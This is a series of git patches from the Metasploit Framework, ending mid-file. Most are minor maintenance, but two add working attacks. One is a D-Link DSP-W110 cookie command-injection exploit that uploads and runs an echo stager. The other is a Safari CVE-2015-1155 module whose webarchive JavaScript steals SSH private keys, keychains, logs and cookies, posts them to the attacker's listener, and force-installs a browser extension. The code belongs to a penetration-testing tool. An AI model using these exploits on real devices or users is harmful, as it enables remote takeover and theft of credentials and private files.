       req = cli.request_raw(
         'uri' => target_uri.path,

From 11366971daa7e21a0cf6f7af3d1e795f129df6fc Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 01:24:17 -0500
Subject: [PATCH 0518/1013] Oh never mind, user-agent makes it more difficult
 to use (more crashes)

---
 modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index e3fa94d1aa..d8947393fd 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -189,7 +189,6 @@ class Metasploit3 < Msf::Auxiliary
         datastore['USERNAME'],
         datastore['PASSWORD']
       )
-      cli.set_config('agent' => datastore['UserAgent'])
       cli.connect
       req = cli.request_raw(
         'uri' => target_uri.path,

From 59af7ef1fc305788aa1cd8f3b54ce81713df5be4 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 10:27:50 -0500
Subject: [PATCH 0519/1013] Remove the extra target_uri

---
 .../auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb    | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index d8947393fd..2fe39b2369 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -48,9 +48,6 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('VHOST')
   end
 
-  def target_uri
-    @target_uri ||= super
-  end
 
   def potential_static_files_uris
     uri = normalize_uri(target_uri.path)

From 60469941388c831b5b35736621aff84e4ad8e141 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 10:31:01 -0500
Subject: [PATCH 0520/1013] version does not return nil

---
 modules/exploits/multi/http/glassfish_deployer.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 272950dd77..61fa5a56fb 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -309,11 +309,11 @@ class Metasploit3 < Msf::Exploit::Remote
     #Set version.  Some GlassFish servers return banner "GlassFish v3".
     if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
       version = $2
-    elsif banner =~ /GlassFish v(\d)/ and version.nil?
+    elsif banner =~ /GlassFish v(\d)/ and version == 'Unknown'
       version = $1
-    elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version.nil?
+    elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version == 'Unknown'
       version = '2.x'
-    elsif banner =~ /Sun Java System Application Server 9/ and version.nil?
+    elsif banner =~ /Sun Java System Application Server 9/ and version == 'Unknown'
       version = '9.x'
     end
 

From 67e711998b321838c393d80ddf33dc37cf23c4b6 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Tue, 23 Jun 2015 12:04:12 -0500
Subject: [PATCH 0521/1013] Do not create the payloads.json file until first
 usage

---
 lib/rex/json_hash_file.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/rex/json_hash_file.rb b/lib/rex/json_hash_file.rb
index 00556efdfe..59d1b42d2d 100644
--- a/lib/rex/json_hash_file.rb
+++ b/lib/rex/json_hash_file.rb
@@ -17,7 +17,6 @@ class JSONHashFile
     @hash = {}
     @last = 0
     ::FileUtils.mkdir_p(::File.dirname(path))
-    synced_update
   end
 
   def [](k)

From 3141d4e465192b3832e579b695d2ad9a783cdd02 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 23 Jun 2015 10:44:15 -0700
Subject: [PATCH 0522/1013] Relocate the mkdir to synced_update

---
 lib/rex/json_hash_file.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/rex/json_hash_file.rb b/lib/rex/json_hash_file.rb
index 59d1b42d2d..fc282d057c 100644
--- a/lib/rex/json_hash_file.rb
+++ b/lib/rex/json_hash_file.rb
@@ -16,7 +16,6 @@ class JSONHashFile
     @lock = Mutex.new
     @hash = {}
     @last = 0
-    ::FileUtils.mkdir_p(::File.dirname(path))
   end
 
   def [](k)
@@ -52,6 +51,7 @@ private
   # Save the file, but prevent thread & process contention
   def synced_update(&block)
     @lock.synchronize do
+      ::FileUtils.mkdir_p(::File.dirname(path))
       ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
         fd.flock(::File::LOCK_EX)
 
@@ -80,7 +80,6 @@ private
     end
   end
 
-
   def parse_data(data)
     return {} if data.to_s.strip.length == 0
     begin

From a9ab5b7bb89cf33b28df013b8adea86e7c9a4cc3 Mon Sep 17 00:00:00 2001
From: Trevor Rosen <trevor@catapult-creative.com>
Date: Tue, 23 Jun 2015 14:08:23 -0500
Subject: [PATCH 0523/1013] Handle content-type weirdness from Anemone

 Fixes #5515
 MSP-12834
---
 Gemfile                         |  2 --
 Gemfile.lock                    | 32 +++++++++++++-------------------
 metasploit-framework-db.gemspec |  2 +-
 3 files changed, 14 insertions(+), 22 deletions(-)

diff --git a/Gemfile b/Gemfile
index 4cced580c1..225cadb5e1 100755
--- a/Gemfile
+++ b/Gemfile
@@ -24,8 +24,6 @@ group :development do
   gem 'pry'
 end
 
-gem 'metasploit_data_models', git: 'git@github.com:rapid7/metasploit_data_models', branch:'bug/MSP-12834/crawler-choke-on-save'
-
 group :development, :test do
   # automatically include factories from spec/factories
   gem 'factory_girl_rails', '~> 4.5.0'
diff --git a/Gemfile.lock b/Gemfile.lock
index 1c2cb44943..fa5381d9d5 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,19 +1,3 @@
-GIT
-  remote: git@github.com:rapid7/metasploit_data_models
-  revision: c36c800866d42187c21c1308a9bac5f3278d8aa3
-  branch: bug/MSP-12834/crawler-choke-on-save
-  specs:
-    metasploit_data_models (1.2.4)
-      activerecord (>= 4.0.9, < 4.1.0)
-      activesupport (>= 4.0.9, < 4.1.0)
-      arel-helpers
-      metasploit-concern (~> 1.0)
-      metasploit-model (~> 1.0)
-      pg
-      postgres_ext
-      railties (>= 4.0.9, < 4.1.0)
-      recog (~> 2.0)
-
 PATH
   remote: .
   specs:
@@ -40,6 +24,7 @@ PATH
       activerecord (>= 4.0.9, < 4.1.0)
       metasploit-credential (~> 1.0)
       metasploit-framework (= 4.11.0.pre.dev)
+      metasploit_data_models (~> 1.2)
       pg (>= 0.11)
     metasploit-framework-pcap (4.11.0.pre.dev)
       metasploit-framework (= 4.11.0.pre.dev)
@@ -139,6 +124,16 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (1.0.2)
+    metasploit_data_models (1.2.5)
+      activerecord (>= 4.0.9, < 4.1.0)
+      activesupport (>= 4.0.9, < 4.1.0)
+      arel-helpers
+      metasploit-concern (~> 1.0)
+      metasploit-model (~> 1.0)
+      pg
+      postgres_ext
+      railties (>= 4.0.9, < 4.1.0)
+      recog (~> 2.0)
     method_source (0.8.2)
     mime-types (2.4.3)
     mini_portile (0.6.2)
@@ -161,7 +156,7 @@ GEM
       coderay (~> 1.1.0)
       method_source (~> 0.8.1)
       slop (~> 3.4)
-    rack (1.5.3)
+    rack (1.5.5)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails (4.0.13)
@@ -179,7 +174,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (10.4.2)
     rb-readline-r7 (0.5.2.0)
-    recog (2.0.5)
+    recog (2.0.6)
       nokogiri
     redcarpet (3.2.3)
     rkelly-remix (0.0.6)
@@ -243,7 +238,6 @@ DEPENDENCIES
   metasploit-framework!
   metasploit-framework-db!
   metasploit-framework-pcap!
-  metasploit_data_models!
   pry
   rake (>= 10.0.0)
   redcarpet
diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec
index ecf71ac825..d64792775f 100644
--- a/metasploit-framework-db.gemspec
+++ b/metasploit-framework-db.gemspec
@@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
   # Metasploit::Credential database models
   spec.add_runtime_dependency 'metasploit-credential', '~> 1.0'
   # Database models shared between framework and Pro.
-  #spec.add_runtime_dependency 'metasploit_data_models', '~> 1.2'
+  spec.add_runtime_dependency 'metasploit_data_models', '~> 1.2'
   # depend on metasploit-framewrok as the optional gems are useless with the actual code
   spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
   # Needed for module caching in Mdm::ModuleDetails

From 5751e196bbb2cc1e15d15c17dbe23072bf9018f6 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 23 Jun 2015 14:43:37 -0500
Subject: [PATCH 0524/1013] Remove extraneous newline

---
 modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index 2fe39b2369..ff2401db30 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -48,7 +48,6 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('VHOST')
   end
 
-
   def potential_static_files_uris
     uri = normalize_uri(target_uri.path)
 

From 93c58ae76d42e444121fde3d1ee6a64a6d2a8cf1 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 23 Jun 2015 13:07:23 -0700
Subject: [PATCH 0525/1013] Bump recog to 2.0.6

---
 Gemfile.lock | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index c7d5318770..e47b18f8a9 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -174,7 +174,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (10.4.2)
     rb-readline-r7 (0.5.2.0)
-    recog (2.0.5)
+    recog (2.0.6)
       nokogiri
     redcarpet (3.2.3)
     rkelly-remix (0.0.6)

From 8bc012a665ca612c22948e80191865dbcfecea67 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Tue, 23 Jun 2015 23:09:08 +0200
Subject: [PATCH 0526/1013] echo stager via upload vulnerability

---
 .../http/dlink_dspw110_cookie_noauth_exec.rb  | 137 +++++++++---------
 1 file changed, 65 insertions(+), 72 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index 76ea25f2fa..38f31f9672 100644
--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -9,13 +9,14 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'D-Link Cookie Command Execution',
       'Description'    => %q{
-        This module exploits an anonymous remote code execution vulnerability on different D-Link
-        devices. The vulnerability is a command injection in the cookie handling process of the
+        This module exploits an anonymous remote upload and code execution vulnerability on different
+        D-Link devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
         successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
         device.
@@ -32,37 +33,27 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
         ],
       'DisclosureDate' => 'Jun 12 2015',
-      'Platform'       => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Payload'     =>
+      'Payload'        =>
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
-          },
+          'DisableNops' => true
         },
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
       'Targets' =>
         [
-          [ 'Automatic',        { } ]
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
         ],
-      'DefaultTarget'    => 0
+      'DefaultTarget'    => 1
       ))
-
-    register_advanced_options(
-      [
-        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
-        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
-      ], self.class)
-
-  end
-
-  def tel_timeout
-    (datastore['TelnetTimeout'] || 10).to_i
-  end
-
-  def banner_timeout
-    (datastore['TelnetBannerTimeout'] || 25).to_i
   end
 
   def check
@@ -89,64 +80,66 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
     end
 
-    print_status("#{peer} - Exploiting...")
+    print_status("#{peer} - Uploading stager ...")
+    @counter = 1
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 99  #limited by our upload, larger payloads crash the web server
+    )
 
-    cmd = "telnetd -l/bin/sh"
-    execute_command(cmd)
-    telnetport = 23
-    handle_telnet(telnetport)
+    print_status("#{peer} - creating payload and executing it ...")
+
+    (1 .. @counter).each do |act_file|
+      #the http server blocks access to our files ... we copy it to a new one
+      #the length of our command is restricted to 19 characters
+      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+      cmd = "chmod +x /tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+      cmd = "/tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+      cmd = "rm /tmp/#{act_file}"
+      execute_final_command(cmd)
+      cmd = "rm /tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+    end
   end
 
-  def handle_telnet(telnetport)
+  def execute_command(cmd,opts)
+    #upload our stager to a shell script
+    #upload takes quite long because there is no response from the web server
 
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    data_cmd = "------------------------------9bcdb049f0d2\r\n"
+    data_cmd << "Content-Disposition: form-data; name=\"name\"; filename=\"#{@counter}\"\r\n"
+    data_cmd << "Content-Type: application/octet-stream\r\n\r\n"
+    data_cmd << "#!/bin/sh\n"
+    data_cmd << cmd
+    data_cmd << "\n------------------------------9bcdb049f0d2--"
 
-    if sock
-      print_good("#{peer} - Backdoor service spawned")
-      add_socket(sock)
-    else
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-    end
+    @counter = @counter + 1
 
-    print_status("#{peer} - Trying to establish a telnet session...")
-    prompt = negotiate_telnet(sock)
-    if prompt.nil?
-      sock.close
-      fail_with(Failure::Unknown, "#{peer} - Unable to establish a telnet session")
-    else
-      print_good("#{peer} - Telnet session successfully established...")
-    end
-
-    handler(sock)
-  end
-
-  def execute_command(cmd)
     begin
-      res = send_request_cgi({
+      send_request_cgi({
+        'method'        => 'POST',
+        'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
+        'ctype'         => "multipart/form-data; boundary=----------------------------9bcdb049f0d2",
+        'data'          => data_cmd
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+
+  end
+
+  def execute_final_command(cmd)
+    begin
+      send_request_cgi({
         'method'        => 'GET',
         'uri'           => "/",
         'cookie'        => "i=`#{cmd}`"
       }, 5)
-      return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
-
-  # Since there isn't user/password negotiation, just wait until the prompt is there
-  def negotiate_telnet(sock)
-    begin
-      Timeout.timeout(banner_timeout) do
-        while(true)
-          data = sock.get_once(-1, tel_timeout)
-          return nil if not data or data.length == 0
-          if data =~ /\x23\x20$/
-            return true
-          end
-        end
-      end
-    rescue ::Timeout::Error
-      return nil
-    end
-  end
 end

From 18a9585f7a06ef984261ad949026b4f21ee02de7 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 23 Jun 2015 16:15:50 -0500
Subject: [PATCH 0527/1013] Add safari module for CVE-2015-1155

---
 lib/msf/core/format/webarchive.rb             | 369 ++++++++++++++++++
 .../gather/safari_file_url_navigation.rb      | 349 +++++++++++++++++
 2 files changed, 718 insertions(+)
 create mode 100644 lib/msf/core/format/webarchive.rb
 create mode 100644 modules/auxiliary/gather/safari_file_url_navigation.rb

diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
new file mode 100644
index 0000000000..df369f7438
--- /dev/null
+++ b/lib/msf/core/format/webarchive.rb
@@ -0,0 +1,369 @@
+#safari.installExtension("com.pinterest.extension-HWZFLG9PNK","http://assets.pinterest.com/ext/Pinterest-Safari.safariextz")
+
+module Msf
+module Format
+module Webarchive
+
+  def initialize(info={})
+    super
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'The file name',  'msf.webarchive']),
+        OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
+        OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
+        OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
+        OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
+        OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
+        OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install"]),
+        OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install"])
+      ],
+      self.class)
+  end
+
+  ### ASSEMBLE THE WEBARCHIVE XML ###
+
+  # @return [String] contents of webarchive as an XML document
+  def webarchive_xml
+    return @xml if not @xml.nil? # only compute xml once
+    @xml = webarchive_header
+    @xml << webarchive_footer
+    @xml
+  end
+
+  # @return [String] the first chunk of the webarchive file, containing the WebMainResource
+  def webarchive_header
+    %Q|
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
+        "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+      <plist version="1.0">
+      <dict>
+        <key>WebMainResource</key>
+        <dict>
+          <key>WebResourceData</key>
+          <data>
+            #{Rex::Text.encode_base64(iframes_container_html)}</data>
+          <key>WebResourceFrameName</key>
+          <string></string>
+          <key>WebResourceMIMEType</key>
+          <string>text/html</string>
+          <key>WebResourceTextEncodingName</key>
+          <string>UTF-8</string>
+          <key>WebResourceURL</key>
+          <string>file:///</string>
+        </dict>
+        <key>WebSubframeArchives</key>
+        <array>
+    |
+  end
+
+  # @return [String] the closing chunk of the webarchive XML code
+  def webarchive_footer
+    %Q|
+        </array>
+      </dict>
+      </plist>
+    |
+  end
+
+  #### JS/HTML CODE ####
+
+  # Wraps the result of the block in an HTML5 document and body
+  def wrap_with_doc(&blk)
+    %Q|
+      <!doctype html>
+      <html>
+        <body>
+          #{yield}
+        </body>
+      </html>
+    |
+  end
+
+  # Wraps the result of the block with <script> tags
+  def wrap_with_script(&blk)
+    "<script>#{yield}</script>"
+  end
+
+  # @return [String] mark up for embedding the iframes for each URL in a place that is
+  #   invisible to the user
+  def iframes_container_html
+    hidden_style = "position:fixed; left:-600px; top:-600px;"
+    wrap_with_doc do
+      frames = "<iframe src='#{apple_extension_url}' style='#{hidden_style}'></iframe>"
+      communication_js + frames + injected_js_helpers + steal_files + install_extension + message
+    end
+  end
+
+  # @return [String] javascript code, wrapped in script tags, that is inserted into the
+  #   WebMainResource (parent) frame so that child frames can communicate "up" to the parent
+  #   and send data out to the listener
+  def communication_js
+    wrap_with_script do
+      %Q|
+        window.addEventListener('message', function(event){
+          var x = new XMLHttpRequest;
+          x.open('POST', '#{backend_url}#{collect_data_uri}', true);
+          x.send(event.data);
+        });
+      |
+    end
+  end
+
+  def apple_extension_url
+    'https://extensions.apple.com'
+  end
+
+  def install_extension
+    wrap_with_script do
+      %Q|
+      var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
+      var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
+
+      setTimeout(function(){
+        function go(){
+          window.focus();
+          window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
+        }
+        setInterval(go, 400);
+      }, 600);
+
+      |
+    end
+  end
+
+  # @return [String] javascript code, wrapped in a script tag, that steals local files
+  #   and sends them back to the listener. This code is executed in the WebMainResource (parent)
+  #   frame, which runs in the file:// protocol
+  def steal_files
+    return '' unless should_steal_files?
+    urls_str = (datastore['FILE_URLS'].split(/\s+/)).reject { |s| !s.include?('$USER') }.join(' ')
+    wrap_with_script do
+      %Q|
+        var filesStr = "#{urls_str}";
+        var files = filesStr.trim().split(/\s+/);
+        function stealFile(url) {
+          var req = new XMLHttpRequest();
+          var sent = false;
+          req.open('GET', url, true);
+          req.onreadystatechange = function() {
+            if (!sent && req.responseText && req.responseText.length > 0) {
+              sendData(url, req.responseText);
+              sent = true;
+            }
+          };
+          req.send(null);
+        };
+        files.forEach(stealFile);
+
+      | + steal_default_files
+    end
+  end
+
+  def default_files
+    ('file:///Users/$USER/.ssh/id_rsa file:///Users/$USER/.ssh/id_rsa.pub '+
+      'file:///Users/$USER/Library/Keychains/login.keychain ' +
+      (datastore['FILE_URLS'].split(/\s+/)).select { |s| s.include?('$USER') }.join(' ')).strip
+  end
+
+  def steal_default_files
+    %Q|
+
+      try {
+
+function xhr(url, cb, responseType) {
+  var x = new XMLHttpRequest;
+  x.onload = function() { cb(x) }
+  x.open('GET', url);
+  if (responseType) x.responseType = responseType;
+  x.send();
+}
+
+var files = ['/var/log/monthly.out', '/var/log/appstore.log', '/var/log/install.log'];
+var done = 0;
+var _u = {};
+
+var cookies = [];
+files.forEach(function(f) {
+  xhr(f, function(x) {
+    var m;
+    var users = [];
+    var pattern = /\\/Users\\/([^\\s^\\/^"]+)/g;
+    while ((m = pattern.exec(x.responseText)) !== null) {
+      if(!_u[m[1]]) { users.push(m[1]); }
+      _u[m[1]] = 1;
+    }
+
+    if (users.length) { next(users); }
+  });
+});
+
+var id=0;
+function next(users) {
+  // now lets steal all the data we can!
+  sendData('usernames'+id, users);
+  id++;
+  users.forEach(function(user) {
+
+    if (#{datastore['STEAL_COOKIES']}) {
+      xhr('file:///Users/'+encodeURIComponent(user)+'/Library/Cookies/Cookies.binarycookies', function(x) {
+        parseBinaryFile(x.response);
+      }, 'arraybuffer');
+    }
+
+    if (#{datastore['STEAL_FILES']}) {
+      var files = '#{Rex::Text.encode_base64(default_files)}';
+      atob(files).split(/\\s+/).forEach(function(file) {
+        file = file.replace('$USER', encodeURIComponent(user));
+        xhr(file, function(x) {
+          sendData(file.replace('file://', ''), x.responseText);
+        });
+      });
+    }
+
+  });
+}
+
+function parseBinaryFile(buffer) {
+  var data = new DataView(buffer);
+
+  // check for MAGIC 'cook' in big endian
+  if (data.getUint32(0, false) != 1668247403)
+    throw new Error('Invalid magic at top of cookie file.')
+
+  // big endian length in next 4 bytes
+  var numPages = data.getUint32(4, false);
+  var pageSizes = [], cursor = 8;
+  for (var i = 0; i < numPages; i++) {
+    pageSizes.push(data.getUint32(cursor, false));
+    cursor += 4;
+  }
+
+  pageSizes.forEach(function(size) {
+    parsePage(buffer.slice(cursor, cursor + size));
+    cursor += size;
+  });
+
+  reportStolenCookies();
+}
+
+function parsePage(buffer) {
+  var data = new DataView(buffer);
+  if (data.getUint32(0, false) != 256) {
+    return; // invalid magic in page header
+  }
+
+  var numCookies = data.getUint32(4, true);
+  var offsets = [];
+  for (var i = 0; i < numCookies; i++) {
+    offsets.push(data.getUint32(8+i*4, true));
+  }
+
+  offsets.forEach(function(offset, idx) {
+    var next = offsets[idx+1] \|\| buffer.byteLength - 4;
+    try{parseCookie(buffer.slice(offset, next));}catch(e){};
+  });
+}
+
+function read(data, offset) {
+  var str = '', c = null;
+  try {
+    while ((c = data.getUint8(offset++)) != 0) {
+      str += String.fromCharCode(c);
+    }
+  } catch(e) {};
+  return str;
+}
+
+function parseCookie(buffer) {
+  var data = new DataView(buffer);
+  var size = data.getUint32(0, true);
+  var flags = data.getUint32(8, true);
+  var urlOffset = data.getUint32(16, true);
+  var nameOffset = data.getUint32(20, true);
+  var pathOffset = data.getUint32(24, true);
+  var valueOffset = data.getUint32(28, true);
+
+  var result = {
+    value: read(data, valueOffset),
+    path: read(data, pathOffset),
+    url: read(data, urlOffset),
+    name: read(data, nameOffset),
+    isSecure: flags & 1,
+    httpOnly: flags & 4
+  };
+
+  cookies.push(result);
+}
+
+function reportStolenCookies() {
+  if (cookies.length > 0) {
+    sendData('cookieDump', cookies);
+  }
+}
+
+} catch (e) { console.log('ERROR: '+e.message); }
+
+    |
+  end
+
+  # @return [String] javascript code, wrapped in script tag, that adds a helper function
+  #   called "sendData()" that passes the arguments up to the parent frame, where it is
+  #   sent out to the listener
+  def injected_js_helpers
+    wrap_with_script do
+      %Q|
+        window.sendData = function(key, val) {
+          var data = {};
+          data[key] = val;
+          window.top.postMessage(JSON.stringify(data), "*")
+        };
+      |
+    end
+  end
+
+  ### HELPERS ###
+
+  # @return [String] the path to send data back to
+  def collect_data_uri
+    '/' + datastore["URIPATH"].chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
+  end
+
+  # @return [String] formatted http/https URL of the listener
+  def backend_url
+    proto = (datastore["SSL"] ? "https" : "http")
+    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    port_str = (datastore['HTTPPORT'].to_i == 80) ? '' : ":#{datastore['HTTPPORT']}"
+    "#{proto}://#{myhost}#{port_str}"
+  end
+
+  # @return [String] URL that serves the malicious webarchive
+  def webarchive_download_url
+    datastore["DOWNLOAD_PATH"]
+  end
+
+  # @return [String] HTML content that is rendered in the <body> of the webarchive.
+  def message
+    "<p>You are being redirected. <a href='#'>Click here if nothing happens</a>.</p>"
+  end
+
+  # @return [Array<String>] of URLs provided by the user
+  def urls
+    (datastore['URLS'] || '').split(/\s+/)
+  end
+
+  # @param [String] input the unencoded string
+  # @return [String] input with dangerous chars replaced with xml entities
+  def escape_xml(input)
+    input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")
+              .gsub(">", "&gt;").gsub("'", "&apos;")
+              .gsub("\"", "&quot;")
+  end
+
+  def should_steal_files?
+    datastore['STEAL_FILES']
+  end
+
+end
+end
+end
diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
new file mode 100644
index 0000000000..85a95e214f
--- /dev/null
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -0,0 +1,349 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+require 'msf/core/format/webarchive'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::FtpServer
+  include Msf::Format::Webarchive
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Mac OS X Safari file:// Redirection Sandbox Escape',
+      'Description' => %q{
+        Due to an issue in the way Safari handles error page origins,
+        an attacker who can entice a user into visiting a malicious page
+        can gain a reference to the resulting error page in the file:// scheme.
+        From there, the attacker can access cross-domain globals, such as 'location'
+        and 'history,' which leads to a total compromise of the sandbox.
+      },
+      'License'     => MSF_LICENSE,
+      'Author'      => [
+        'joev' # discovery, module
+      ],
+      'References'  => [
+        ['ZDI', '15-288'],
+        ['CVE', '2015-1155']
+      ],
+      'Platform'    => 'osx',
+      'Targets'     =>
+        [
+          [ 'Mac OS X', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 16 2014'
+    ))
+
+
+    register_options(
+      [
+        OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
+        OptPort.new('SRVPORT',   [true, "The local port to use for the FTP server", 8081]),
+        OptPort.new('HTTPPORT',  [true, "The HTTP server port", 8080])
+      ], self.class )
+  end
+
+  def lookup_lhost(c=nil)
+    # Get the source address
+    if datastore['SRVHOST'] == '0.0.0.0'
+      Rex::Socket.source_address( c || '50.50.50.50')
+    else
+      datastore['SRVHOST']
+    end
+  end
+
+  def on_request_uri(cli, req)
+    if req.method =~ /post/i
+      begin
+        data_str = if req.body.size > 0
+          req.body
+        else
+          req.qstring['data']
+        end
+        data = JSON::parse(data_str || '')
+        file = record_data(data, cli)
+        send_response(cli, 200, 'OK', '')
+        print_good "data #{data.keys.join(',')} received and stored to #{file}"
+      rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
+        print_error "Invalid JSON received."
+        send_not_found(cli)
+      end
+    elsif req.uri =~ /#{popup_path}$/
+      send_response(cli, 200, 'OK', popup_html)
+    else
